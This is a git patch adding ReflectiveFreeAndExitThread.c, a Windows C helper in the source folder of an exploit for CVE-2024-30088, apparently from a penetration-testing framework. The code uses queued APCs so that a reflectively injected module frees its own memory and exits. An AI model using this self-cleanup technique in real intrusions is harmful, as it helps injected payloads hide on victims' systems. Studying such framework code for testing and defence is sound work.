From b32234382e019534cf9b87d3c75b7f8e7ec335a8 Mon Sep 17 00:00:00 2001 From: Jack Heysel Date: Thu, 29 Aug 2024 18:53:39 -0400 Subject: [PATCH] Add correct missing file --- .../ReflectiveFreeAndExitThread.c | 50 +++++++++++++++++-- 1 file changed, 45 insertions(+), 5 deletions(-) diff --git a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c index 8920538961ff..77feb1b94e7b 100644 --- a/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c +++ b/external/source/exploits/CVE-2024-30088/CVE-2024-30088/ReflectiveFreeAndExitThread.c @@ -1,8 +1,48 @@ -#ifndef _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H -#define _METERPRETER_SOURCE_REFLECTIVE_FREE_AND_EXIT_THREAD_H +#include "ReflectiveFreeAndExitThread.h" -#include +typedef NTSTATUS +(*NtQueueApcThread)( + HANDLE ThreadHandle, + PVOID ApcRoutine, + ULONG_PTR SystemArgument1, + ULONG_PTR SystemArgument2, + ULONG_PTR SystemArgument3 + ); -VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode); +VOID ReflectiveFreeAndExitThread(HINSTANCE hAppInstance, DWORD dwExitCode) { + NtQueueApcThread pNtQueueApcThread = (NtQueueApcThread)GetProcAddress(GetModuleHandle(TEXT("ntdll")), "NtQueueApcThread"); + HANDLE hThread = NULL; + HANDLE hThisThread = NULL; -#endif \ No newline at end of file + do { + if (!pNtQueueApcThread) + break; + + // create a suspended thread that will just exit once the APCs have executed + hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ExitThread, 0, CREATE_SUSPENDED, NULL); + if (!hThread) + break; + + // open a real handle to this thread to pass in the APC so it operates on this thread and not itself + hThisThread = OpenThread(THREAD_QUERY_INFORMATION | SYNCHRONIZE, FALSE, GetCurrentThreadId()); + if (!hThisThread) + break; + + // tell that thread to wait on this thread, ensures VirtualFree isn't called until this thread has exited + pNtQueueApcThread(hThread, WaitForSingleObjectEx, (ULONG_PTR)hThisThread, INFINITE, FALSE); + + // then close the handle so it's not leaked + QueueUserAPC((PAPCFUNC)CloseHandle, hThread, (ULONG_PTR)hThisThread); + + // then free the memory + pNtQueueApcThread(hThread, VirtualFree, (ULONG_PTR)hAppInstance, 0, MEM_RELEASE); + + ResumeThread(hThread); + } while (FALSE); + + if (hThread) + CloseHandle(hThread); + + ExitThread(dwExitCode); + return; +} \ No newline at end of file